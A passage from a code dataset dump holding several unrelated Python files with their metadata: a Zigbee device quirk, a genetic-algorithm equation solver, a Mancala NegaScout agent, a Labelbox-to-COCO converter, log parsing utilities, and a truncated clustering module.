Identify.cluster_id,\n ZLinkyTICMetering,\n MeterIdentification.cluster_id,\n ElectricalMeasurement.cluster_id,\n 0xFF66, # Manufacturer Specific\n ],\n OUTPUT_CLUSTERS: [Ota.cluster_id],\n },\n 242: {\n PROFILE_ID: 41440,\n DEVICE_TYPE: 0x0061,\n INPUT_CLUSTERS: [GreenPowerProxy.cluster_id],\n OUTPUT_CLUSTERS: [GreenPowerProxy.cluster_id],\n },\n },\n }\n", "repo_name": "Datakg/tuya", "sub_path": "zhaquirks/lixee/zlinky.py", "file_name": "zlinky.py", "file_ext": "py", "file_size_in_byte": 2535, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "zigpy.quirks.CustomCluster", "line_number": 19, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.smartenergy.Metering", "line_number": 19, "usage_type": "name"}, {"api_name": "zigpy.quirks.CustomDevice", "line_number": 29, "usage_type": "name"}, {"api_name": "zhaquirks.const.MODELS_INFO", "line_number": 33, "usage_type": "name"}, {"api_name": "zhaquirks.const.ENDPOINTS", "line_number": 34, "usage_type": "name"}, {"api_name": "zhaquirks.lixee.LIXEE", "line_number": 33, "usage_type": "name"}, {"api_name": "zhaquirks.const.PROFILE_ID", "line_number": 36, "usage_type": "name"}, {"api_name": "zhaquirks.const.DEVICE_TYPE", "line_number": 37, "usage_type": "name"}, {"api_name": "zhaquirks.const.INPUT_CLUSTERS", "line_number": 38, "usage_type": "name"}, {"api_name": "zhaquirks.const.OUTPUT_CLUSTERS", "line_number": 46, "usage_type": "name"}, {"api_name": "zigpy.profiles.zha.PROFILE_ID", "line_number": 36, "usage_type": "attribute"}, {"api_name": "zigpy.profiles.zha", "line_number": 36, "usage_type": "name"}, {"api_name": "zigpy.profiles.zha.DeviceType", "line_number": 37, "usage_type": "attribute"}, {"api_name": "zigpy.profiles.zha", "line_number": 37, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.Basic.cluster_id", "line_number": 39, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.Basic", "line_number": 39, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.Identify.cluster_id", "line_number": 40, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.Identify", "line_number": 40, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.smartenergy.Metering.cluster_id", "line_number": 41, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.smartenergy.Metering", "line_number": 41, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.homeautomation.MeterIdentification.cluster_id", "line_number": 42, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.homeautomation.MeterIdentification", "line_number": 42, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.homeautomation.ElectricalMeasurement.cluster_id", "line_number": 43, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.homeautomation.ElectricalMeasurement", "line_number": 43, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.Ota.cluster_id", "line_number": 46, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.Ota", "line_number": 46, "usage_type": "name"}, {"api_name": "zhaquirks.const.PROFILE_ID", "line_number": 49, "usage_type": "name"}, {"api_name": "zhaquirks.const.DEVICE_TYPE", "line_number": 50, "usage_type": "name"}, {"api_name": "zhaquirks.const.INPUT_CLUSTERS", "line_number": 51, "usage_type": "name"}, {"api_name": "zhaquirks.const.OUTPUT_CLUSTERS", "line_number": 52, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.GreenPowerProxy.cluster_id", "line_number": 51, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.GreenPowerProxy", "line_number": 51, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.GreenPowerProxy.cluster_id", "line_number": 52, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.GreenPowerProxy", "line_number": 52, "usage_type": "name"}, {"api_name": "zhaquirks.const.ENDPOINTS", "line_number": 57, "usage_type": "name"}, {"api_name": "zhaquirks.const.PROFILE_ID", "line_number": 59, "usage_type": "name"}, {"api_name": "zhaquirks.const.DEVICE_TYPE", "line_number": 60, "usage_type": "name"}, {"api_name": "zhaquirks.const.INPUT_CLUSTERS", "line_number": 61, "usage_type": "name"}, {"api_name": "zhaquirks.const.OUTPUT_CLUSTERS", "line_number": 69, "usage_type": "name"}, {"api_name": "zigpy.profiles.zha.PROFILE_ID", "line_number": 59, "usage_type": "attribute"}, {"api_name": "zigpy.profiles.zha", "line_number": 59, "usage_type": "name"}, {"api_name": "zigpy.profiles.zha.DeviceType", "line_number": 60, "usage_type": "attribute"}, {"api_name": "zigpy.profiles.zha", "line_number": 60, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.Basic.cluster_id", "line_number": 62, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.Basic", "line_number": 62, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.Identify.cluster_id", "line_number": 63, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.Identify", "line_number": 63, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.homeautomation.MeterIdentification.cluster_id", "line_number": 65, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.homeautomation.MeterIdentification", "line_number": 65, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.homeautomation.ElectricalMeasurement.cluster_id", "line_number": 66, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.homeautomation.ElectricalMeasurement", "line_number": 66, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.Ota.cluster_id", "line_number": 69, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.Ota", "line_number": 69, "usage_type": "name"}, {"api_name": "zhaquirks.const.PROFILE_ID", "line_number": 72, "usage_type": "name"}, {"api_name": "zhaquirks.const.DEVICE_TYPE", "line_number": 73, "usage_type": "name"}, {"api_name": "zhaquirks.const.INPUT_CLUSTERS", "line_number": 74, "usage_type": "name"}, {"api_name": "zhaquirks.const.OUTPUT_CLUSTERS", "line_number": 75, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.GreenPowerProxy.cluster_id", "line_number": 74, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.GreenPowerProxy", "line_number": 74, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.GreenPowerProxy.cluster_id", "line_number": 75, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.GreenPowerProxy", "line_number": 75, "usage_type": "name"}]} +{"seq_id": "1856604317", "text": "\"\"\"\nThe equation: 1027 * x + 712 * y = 1\nD(x) = [-1 500; 1 500]\nD(y) = [-1 500; 1 500]\n\"\"\"\nimport random\nimport operator\n\nfrom deap import tools, base, creator, algorithms\n\nMIN, MAX = -1500, 1500\nSOLUTION = [-165, 238]\nVARIABLES = len(SOLUTION)\n\nMUT_MIN, MUT_MAX = -10, 10\nNGEN, IND_SIZE, CXPB, MUTPB, TRN_SIZE = 100, 50, 0.5, 0.5, 100\nHALL_SIZE = 10\nDEFAULT_MAIN_ARGS = NGEN, IND_SIZE, CXPB, MUTPB\n\nBEST_INSTANCE_MSG = 'Best instance:'\nNO_SOLUTION_MSG = 'No solution in integers. Distance is:'\n\n\ndef fitness(instance):\n x, y = instance\n return abs(1027 * x + 712 * y - 1),\n\n\ndef spawn_instance():\n return random.randint(MIN, MAX), random.randint(MIN, MAX)\n\n\ndef mutate(instance, mutpb):\n if random.random() <= mutpb:\n index = random.randint(0, len(instance) - 1)\n instance[index] += random.randint(MUT_MIN, MUT_MAX)\n return instance,\n return instance,\n\n\ndef get_best_result(population):\n if isinstance(population[0], list):\n fitness_values = list(map(fitness, population))\n index = fitness_values.index(min(fitness_values))\n return population[index]\n else:\n return min(population, key=operator.attrgetter('fitness'))\n\n\ndef terminate(population):\n if fitness(get_best_result(population)) == (0, ):\n raise StopIteration\n return False\n\n\ndef distance_from_best_result(population):\n result = get_best_result(population)\n return fitness(result)[0]\n\n\ndef output(best_instance):\n print(BEST_INSTANCE_MSG, best_instance)\n distance = fitness(best_instance)\n if distance:\n print(NO_SOLUTION_MSG, distance)\n\n\ndef setup(mutpb):\n creator.create(\"FitnessMin\", base.Fitness, weights=(-1,))\n creator.create(\"Individual\", list, fitness=creator.FitnessMin)\n toolbox = base.Toolbox()\n toolbox.register(\"attribute\", random.randint, MIN, MAX)\n toolbox.register(\"individual\", tools.initRepeat, creator.Individual,\n toolbox.attribute, n=VARIABLES)\n toolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n toolbox.register(\"mate\", tools.cxOnePoint)\n toolbox.register(\"mutate\", mutate, mutpb=mutpb)\n toolbox.register(\"select\", tools.selBest)\n toolbox.register(\"evaluate\", fitness)\n return toolbox\n\n\ndef main(ngen, ind_size, cxpb, mutpb):\n toolbox = setup(ind_size)\n population = toolbox.population(n=ind_size)\n stats = tools.Statistics()\n stats.register(\"best_instance_of_population\", get_best_result)\n stats.register(\"distance\", distance_from_best_result)\n stats.register(\"terminate\", terminate)\n halloffame = tools.HallOfFame(HALL_SIZE)\n try:\n algorithms.eaSimple(population, toolbox, cxpb, mutpb, ngen,\n stats=stats, halloffame=halloffame)\n except StopIteration:\n pass\n finally:\n best_instance = halloffame[0]\n output(best_instance)\n return best_instance\n\n\nif __name__ == '__main__':\n main(*DEFAULT_MAIN_ARGS)", "repo_name": "ViachKakovskyi/ga-example-diophantine", "sub_path": "diophantine.py", "file_name": "diophantine.py", "file_ext": "py", "file_size_in_byte": 2960, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.randint", "line_number": 30, "usage_type": "call"}, {"api_name": "random.random", "line_number": 34, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 35, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 36, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 47, "usage_type": "call"}, {"api_name": "deap.creator.create", "line_number": 69, "usage_type": "call"}, {"api_name": "deap.creator", "line_number": 69, "usage_type": "name"}, {"api_name": "deap.base.Fitness", "line_number": 69, "usage_type": "attribute"}, {"api_name": "deap.base", "line_number": 69, "usage_type": "name"}, {"api_name": "deap.creator.create", "line_number": 70, "usage_type": "call"}, {"api_name": "deap.creator", "line_number": 70, "usage_type": "name"}, {"api_name": "deap.creator.FitnessMin", "line_number": 70, "usage_type": "attribute"}, {"api_name": "deap.base.Toolbox", "line_number": 71, "usage_type": "call"}, {"api_name": "deap.base", "line_number": 71, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 72, "usage_type": "attribute"}, {"api_name": "deap.tools.initRepeat", "line_number": 73, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 73, "usage_type": "name"}, {"api_name": "deap.creator.Individual", "line_number": 73, "usage_type": "attribute"}, {"api_name": "deap.creator", "line_number": 73, "usage_type": "name"}, {"api_name": "deap.tools.initRepeat", "line_number": 75, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 75, "usage_type": "name"}, {"api_name": "deap.tools.cxOnePoint", "line_number": 76, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 76, "usage_type": "name"}, {"api_name": "deap.tools.selBest", "line_number": 78, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 78, "usage_type": "name"}, {"api_name": "deap.tools.Statistics", "line_number": 86, "usage_type": "call"}, {"api_name": "deap.tools", "line_number": 86, "usage_type": "name"}, {"api_name": "deap.tools.HallOfFame", "line_number": 90, "usage_type": "call"}, {"api_name": "deap.tools", "line_number": 90, "usage_type": "name"}, {"api_name": "deap.algorithms.eaSimple", "line_number": 92, "usage_type": "call"}, {"api_name": "deap.algorithms", "line_number": 92, "usage_type": "name"}]} +{"seq_id": "29580198932", "text": "import random\nfrom typing import List, Union\n\nimport numpy as np\n\nfrom mancala.agents.base import BaseAgent\nfrom mancala.state.base import BaseState\n\n\ndef negamax(state: BaseState, depth: int, maximizing_player: int) -> float:\n color = 1 if maximizing_player == state.turn else -1\n if depth == 0 or state._done:\n return color * (state.scores[state.turn] - state.scores[1 - state.turn])\n legal_actions = state.legal_actions(state.turn)\n if legal_actions is None:\n child = state.clone().proceed_action(None)\n return -negamax(child, depth - 1, maximizing_player)\n value = -float(\"inf\")\n for act in legal_actions:\n child = state.clone().proceed_action(act)\n value = max(value, negamax(child, depth - 1, maximizing_player))\n return -value\n\n\ndef negascout(state: BaseState, depth: int, maximizing_player: int):\n color = 1 if maximizing_player == state.turn else -1\n return color * pvs(state, depth, -float(\"inf\"), float(\"inf\"), 1)\n\n\ndef pvs(state: BaseState, depth: int, alpha: float, beta: float, color: int) -> float:\n \"\"\"\n Principal variation search (PVS), also known as NegaScout\n alpha: minimum score that the maximizing player is assured of\n beta: maximum score that the minimizing player is assured of\n \"\"\"\n assert color in [-1, 1], color\n # Ref: https://en.wikipedia.org/wiki/Principal_variation_search\n if depth == 0 or state._done:\n return state.scores[state.turn] - state.scores[1 - state.turn]\n\n legal_actions = state.legal_actions(state.turn)\n if legal_actions is None:\n clone = state.clone().proceed_action(None)\n return -pvs(clone, depth - 1, -beta, -alpha, -color)\n sorted_actions = legal_actions.copy()\n # The search order should be small to large idx, since closer to point pocket is more important\n for act in legal_actions:\n if state._can_continue_on_point(act):\n sorted_actions.insert(0, sorted_actions.pop(sorted_actions.index(act)))\n\n for i, act in enumerate(sorted_actions):\n child = state.clone().proceed_action(act)\n if i == 0:\n score = -pvs(child, depth - 1, -beta, -alpha, -color)\n else:\n score = -pvs(child, depth - 1, -alpha - 0.01, -alpha, -color)\n if alpha < score < beta:\n score = -pvs(child, depth - 1, -beta, -score, -color)\n alpha = max(alpha, score)\n if alpha >= beta:\n break\n return alpha\n\n\nclass NegaScoutAgent(BaseAgent):\n \"\"\"\n Agent based on mini-max algorithm\n \"\"\"\n\n def __init__(self, id: int, depth: int = 2):\n self.deterministic = False\n self._seed = 42\n self._depth = depth\n self.set_id(id)\n\n def policy(self, state: BaseState) -> Union[int, None]:\n assert self.id == state.turn, self\n legal_actions = state.legal_actions(state.turn)\n if legal_actions is None:\n return None\n action_rewards = [\n negascout(state.clone().proceed_action(a), self._depth, self.id)\n for a in legal_actions\n ]\n # print(legal_actions)\n # print(action_rewards)\n max_reward = max(action_rewards)\n max_actions = [\n a for a, r in zip(legal_actions, action_rewards) if r == max_reward\n ]\n if self.deterministic:\n random.seed(self._seed)\n return random.choice(max_actions)", "repo_name": "qqpann/Mancala", "sub_path": "mancala/agents/negascout.py", "file_name": "negascout.py", "file_ext": "py", "file_size_in_byte": 3405, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "52", "api": [{"api_name": "mancala.state.base.BaseState", "line_number": 10, "usage_type": "name"}, {"api_name": "mancala.state.base.BaseState", "line_number": 25, "usage_type": "name"}, {"api_name": "mancala.state.base.BaseState", "line_number": 30, "usage_type": "name"}, {"api_name": "mancala.agents.base.BaseAgent", "line_number": 65, "usage_type": "name"}, {"api_name": "mancala.state.base.BaseState", "line_number": 76, "usage_type": "name"}, {"api_name": "random.seed", "line_number": 92, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 93, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 76, "usage_type": "name"}]} +{"seq_id": "2832326494", "text": "import json\nimport numpy as np\nfrom PIL import Image, ImageDraw\n\nprint('Start program')\n\nimg_shape = [1920, 1080] #height, widht\nlabel_names = ['Wrinkle_critical', 'Wrinkle_nonCritical'] #Same as 'title' in JSON file\njson_name = 'labels.json'\n\nprint('Open label JSON')\n\nwith open(json_name) as json_file:\n labelbox_data = json.load(json_file)\n\nimages = []\nannotations = []\n\nimg_id = 0\nann_id = 0\n\ndef getbbox(points):\n global img_shape\n polygons = points\n mask = polygons_to_mask(img_shape, polygons)\n return mask2box(mask)\n\ndef mask2box(mask):\n\n index = np.argwhere(mask == 1)\n rows = index[:, 0]\n clos = index[:, 1]\n\n left_top_r = np.min(rows) # y\n left_top_c = np.min(clos) # x\n\n right_bottom_r = np.max(rows)\n right_bottom_c = np.max(clos)\n\n return [\n left_top_c,\n left_top_r,\n right_bottom_c - left_top_c,\n right_bottom_r - left_top_r,\n ]\n\ndef polygons_to_mask(img_shape, polygons):\n mask = np.zeros(img_shape, dtype=np.uint8)\n mask = Image.fromarray(mask)\n xy = list(map(tuple, polygons))\n ImageDraw.Draw(mask).polygon(xy=xy, outline=1, fill=1)\n mask = np.array(mask, dtype=bool)\n return mask\n\nprint('Create info from JSON')\n\nfor data_row in labelbox_data:\n\n image = {}\n image['id'] = img_id\n image['license'] = 1\n image['file_name'] = data_row['External ID']\n image['height'] = img_shape[0]\n image['widht'] = img_shape[1]\n image['date_caputred'] = data_row['Created At']\n\n images.append(image)\n\n #Append polygonoms\n for poly in data_row['Label']['objects']:\n annotation = {}\n\n points = []\n seg = []\n for pnt in poly['polygon']:\n points.append([pnt['x'], pnt['y']])\n seg.append(pnt['x'])\n seg.append(pnt['y'])\n\n contour = np.array(points)\n x = contour[:, 0]\n y = contour[:, 1]\n \n area = 0.5 * np.abs(np.dot(x, np.roll(y, 1)) - np.dot(y, np.roll(x, 1)))\n\n annotation[\"segmentation\"] = [seg]\n annotation[\"iscrowd\"] = 0\n annotation[\"area\"] = area\n annotation[\"image_id\"] = img_id\n\n annotation[\"bbox\"] = list(map(float, getbbox(points)))\n\n cat_id = label_names.index(poly['title'])\n\n annotation[\"category_id\"] = cat_id \n annotation[\"id\"] = ann_id\n\n annotations.append(annotation)\n ann_id +=1\n\n img_id+=1\n\nprint('Create new JSON structure')\n\ncoco_struc= {\n 'info': {\n 'year': '2022', \n 'version': '1',\n \"description\": \"Translated from labelbox\",\n \"contributor\": \"User\",\n }, \n 'licenses': [{\n \"id\": 1,\n \"url\": \"https://creativecommons.org/publicdomain/zero/1.0/\",\n \"name\": \"Public Domain\"\n }],\n \"categories\": [\n {\n \"id\": 0,\n \"name\": \"wrinkle_critical\",\n \"supercategory\": \"none\"\n },\n {\n \"id\": 1,\n \"name\": \"wrinkle_nonCritical\",\n \"supercategory\": \"none\"\n }],\n 'images': images,\n 'annotations': annotations\n }\n\nprint('Export JSON')\n\nwith open('labels_coco.json', 'w') as outfile:\n json.dump(coco_struc, outfile)\n\nprint('coco JSON exported')", "repo_name": "SamRutten2000/Labelbox_converter", "sub_path": "labelbox2coco.py", "file_name": "labelbox2coco.py", "file_ext": "py", "file_size_in_byte": 3280, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 48, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 49, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 49, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 51, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 84, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "11909658955", "text": "from datetime import datetime\n\nfrom logs_parser import LogsParser\nfrom db_management import DataBaseManager\nfrom logger_settings import logger\n\n\nclass LogsAnalyzer:\n \"\"\"\n============================================================\nКласс пр��дназначен для анализа данных со стороннего ресурса.\n============================================================\n \"\"\"\n\n def __init__(self):\n self.logs_parser = LogsParser()\n self.logs_date = None\n self.db = None\n\n def _date_validation(self, input_date: str) -> None:\n \"\"\"Функция проверяет дату на корректный формат и поднимает исключение, если дата некорректна.\"\"\"\n # Можно воспользоваться возможностями 'datetime.strptime', но, учитывая иные требования, решил велосипедить.\n if input_date.isdigit() and len(input_date) == 8:\n logger.debug('Введенная пользователем дата валидирована успешно.')\n self.logs_date = input_date\n else:\n logger.error(f'Пользователем введенна дата несоответствующего формата - {input_date}.')\n raise ValueError(f'Введенна дата несоответствующего формата - {input_date}.')\n\n def _array_partition(self, data: list, low: int, high: int) -> int:\n \"\"\"Функция выбирает средний элемент в качестве опорного (сортирует слева направо по увеличению).\"\"\"\n middle = data[(low + high) // 2]\n i = low - 1\n j = high + 1\n\n while True:\n i += 1\n\n while data[i]['created_at'] < middle['created_at']:\n i += 1\n\n j -= 1\n while data[j]['created_at'] > middle['created_at']:\n j -= 1\n\n if i >= j:\n return j\n\n data[i], data[j] = data[j], data[i]\n\n def _sort_logs(self, raw_data: dict) -> dict:\n \"\"\"Функция сортирует полученные логи по полю 'created_at'.\"\"\"\n all_logs = raw_data['logs']\n\n def _quick_sort(array: list, low: int, high: int):\n \"\"\"Вспомогательная рекурсивная функция для сортировки.\"\"\"\n if low < high:\n middle_index = self._array_partition(array, low, high)\n _quick_sort(array, low, middle_index)\n _quick_sort(array, middle_index + 1, high)\n\n _quick_sort(all_logs, 0, len(all_logs) - 1)\n\n logger.info(f'Лог от {self.logs_date} отсортирован.')\n return all_logs\n\n def _errors_in_log(self, raw_data: dict) -> bool:\n \"\"\"Функция проверяет лог на наличие ошибок.\"\"\"\n if raw_data['error']:\n return True\n return False\n\n def make_analysis(self, input_date: str) -> str:\n \"\"\"Функция-агрегатор объединяет в себе логику работы класса.\"\"\"\n logger.info(f'Приступаю к анализу лога от {input_date}.')\n print(f'Приступаю к анализу лога от {input_date}.')\n\n self._date_validation(input_date)\n raw_data = self.logs_parser.get_data_from_logs_server(self.logs_date)\n\n if self._errors_in_log(raw_data):\n error_message = raw_data['error']\n logger.error(f'В логе обнаружена ошибка: {error_message}.')\n return f'Введенна дата несоответствующего формата - {self.logs_date}.'\n\n sorted_data = self._sort_logs(raw_data)\n\n if not self.db:\n self.db = DataBaseManager(self.logs_date)\n\n for row in sorted_data:\n creation_time = datetime.fromisoformat(row['created_at'])\n db_response = self.db.save_data_to_db(\n created_at=creation_time,\n first_name=row['first_name'],\n second_name=row['second_name'],\n message=row['message'],\n user_id=row['user_id']\n )\n logger.debug(db_response)\n\n logger.info(f'Разбор и сохранение лога от {self.logs_date} завершены успешно.')\n return f'Разбор и сохранение лога от {self.logs_date} завершены успешно.'\n\n def load_saved_logs(self, input_date: str):\n \"\"\"Функция выгружает лог за конкретную дату из БД.\"\"\"\n self._date_validation(input_date)\n if not self.db:\n self.db = DataBaseManager(self.logs_date)\n\n all_loaded_logs = self.db.get_all_data_from_db()\n return all_loaded_logs\n", "repo_name": "Interligo/script-to-get-logs", "sub_path": "logs_analyzer.py", "file_name": "logs_analyzer.py", "file_ext": "py", "file_size_in_byte": 5036, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logs_parser.LogsParser", "line_number": 16, "usage_type": "call"}, {"api_name": "logger_settings.logger.debug", "line_number": 24, "usage_type": "call"}, {"api_name": "logger_settings.logger", "line_number": 24, "usage_type": "name"}, {"api_name": "logger_settings.logger.error", "line_number": 27, "usage_type": "call"}, {"api_name": "logger_settings.logger", "line_number": 27, "usage_type": "name"}, {"api_name": "logger_settings.logger.info", "line_number": 64, "usage_type": "call"}, {"api_name": "logger_settings.logger", "line_number": 64, "usage_type": "name"}, {"api_name": "logger_settings.logger.info", "line_number": 75, "usage_type": "call"}, {"api_name": "logger_settings.logger", "line_number": 75, "usage_type": "name"}, {"api_name": "logger_settings.logger.error", "line_number": 83, "usage_type": "call"}, {"api_name": "logger_settings.logger", "line_number": 83, "usage_type": "name"}, {"api_name": "db_management.DataBaseManager", "line_number": 89, "usage_type": "call"}, {"api_name": "datetime.datetime.fromisoformat", "line_number": 92, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 92, "usage_type": "name"}, {"api_name": "logger_settings.logger.debug", "line_number": 100, "usage_type": "call"}, {"api_name": "logger_settings.logger", "line_number": 100, "usage_type": "name"}, {"api_name": "logger_settings.logger.info", "line_number": 102, "usage_type": "call"}, {"api_name": "logger_settings.logger", "line_number": 102, "usage_type": "name"}, {"api_name": "db_management.DataBaseManager", "line_number": 109, "usage_type": "call"}]} +{"seq_id": "15344834600", "text": "\"\"\"\n日志读取相关,主要用于从日志中提取返回字符串\n\"\"\"\n\nimport json\nimport re\n\n\nclass LogReader:\n \"\"\"\n 日志读取,读取从kibana控制台获取的日志查询结果json,保存到的 .json 文件中\n \"\"\"\n\n @staticmethod\n def read_log_from_json(log_path='log.json',\n filter_method=lambda x: x,\n reg_method=lambda x: x,\n single_convert_method=lambda x: x,\n total_convert_method=lambda x: x):\n \"\"\"\n 这里的取值 key 与kibana 的日志格式有关,日志格式不同则不适用\n :param total_convert_method: 整体数据转换方法\n :param single_convert_method: 单条数据转换方法 例如 json.loads()\n :param log_path: 日志 json 文件路径\n :param filter_method: 日志过滤方法,用于过滤在 kibana 中不方便过滤的日志\n :param reg_method: 日志截取匹配方法,用于在日志中截取或者匹配到需要的 数据 json\n :return: 数据列表\n \"\"\"\n if log_path.__contains__('.json') is False:\n return []\n with open(log_path) as f:\n load_ = json.load(f)\n hits_ = load_['hits']['hits']\n # 过滤日志\n logs = list(filter(filter_method, hits_))\n log_sources = list(map(lambda x: x['_source']['log'], logs))\n # 日志内容匹配\n data = list(map(single_convert_method, map(reg_method, log_sources)))\n return total_convert_method(data)\n\n @staticmethod\n def filter_method_by_contains(content: str):\n \"\"\"\n 通过包含关系过滤,结果必须包含 给出的字符串\n\n :param content: 被包含的字符串\n :return: 筛选 lambda 参数\n \"\"\"\n return lambda x: x['_source']['log'].__contains__(content)\n\n @staticmethod\n def reg_method_by_split(splitter: str, index: int):\n \"\"\"\n 根据切分内容进行字符串内容转换\n\n :param splitter: 用于切分的子串\n :param index: 切分后目标内容在 list 中的索引\n :return: 转换后的字符串\n \"\"\"\n return lambda x: x.split(splitter)[index]\n\n @staticmethod\n def reg_method_by_regex(regex: str, index: int):\n \"\"\"\n 通过正则匹配进行字符串内容转换\n\n :param regex: 正则表达式, 例:'body:(.*?),protocol' 匹配 body: 和 ,protocol 之间的内容\n :param index: 目标子串在正则匹配结果 list 中的索引\n :return: 转换后的字符串\n \"\"\"\n return lambda x: re.findall(\n regex,\n # 替换空白字符\n x.replace('\\n', '').replace(' ', '').replace('\\t', ''), 0\n )[index]\n", "repo_name": "yromeMfOtuO/little-finger", "sub_path": "little_finger/log_reader/log_reader.py", "file_name": "log_reader.py", "file_ext": "py", "file_size_in_byte": 2814, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 32, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "85007892", "text": "import numpy as np\nfrom joblib import Parallel, delayed\nimport torch\n\nfrom src.clustering_models.clusternet_modules.clusternet_trainer import (\n ClusterNetTrainer,\n)\n\n\ndef _parallel_compute_distance(X, cluster):\n n_samples = X.shape[0]\n dis_mat = np.zeros((n_samples, 1))\n for i in range(n_samples):\n dis_mat[i] += np.sqrt(np.sum((X[i] - cluster) ** 2, axis=0))\n return dis_mat\n\n\nclass ClusterNet(object):\n def __init__(self, args, feature_extractor):\n self.args = args\n self.latent_dim = args.latent_dim\n self.n_clusters = args.n_clusters\n self.clusters = np.zeros((self.n_clusters, self.latent_dim))\n self.count = 100 * np.ones((self.n_clusters)) # serve as learning rate\n self.n_jobs = args.n_jobs\n self.feature_extractor = feature_extractor\n self.device = \"cuda\" if torch.cuda.is_available() and args.gpus is not None else \"cpu\"\n\n def _compute_dist(self, X):\n dis_mat = Parallel(n_jobs=self.n_jobs)(\n delayed(_parallel_compute_distance)(X, self.clusters[i])\n for i in range(self.n_clusters)\n )\n dis_mat = np.hstack(dis_mat)\n\n return dis_mat\n\n def init_cluster(self, train_loader, val_loader, logger, indices=None, centers=None, init_num=0):\n \"\"\" Generate initial clusters using the clusternet\n init num is the number of time the clusternet was initialized (from the AE_ClusterPipeline module)\n \"\"\"\n self.feature_extractor.freeze()\n self.model = ClusterNetTrainer(\n args=self.args,\n init_k=self.n_clusters,\n latent_dim=self.latent_dim,\n feature_extractor=self.feature_extractor,\n centers=centers,\n init_num=init_num\n )\n self.fit_cluster(train_loader, val_loader, logger, centers)\n self.model.cluster_model.freeze()\n self.feature_extractor.unfreeze()\n self.feature_extractor.to(device=self.device)\n\n def fit_cluster(self, train_loader, val_loader, logger, centers=None):\n self.feature_extractor.freeze()\n self.model.cluster_model.unfreeze()\n self.model.fit(train_loader, val_loader, logger, self.args.train_cluster_net, centers=centers)\n self.model.cluster_model.freeze()\n self.clusters = self.model.get_clusters_centers() # copy clusters\n self._set_K(self.model.get_current_K())\n self.feature_extractor.unfreeze()\n self.feature_extractor.to(device=self.device)\n\n def freeze(self):\n self.model.cluster_model.freeze()\n self.feature_extractor.unfreeze()\n\n def unfreeze(self):\n self.model.cluster_model.unfreeze()\n self.model.cluster_model.to(device=self.device)\n\n def update_cluster_center(self, X, 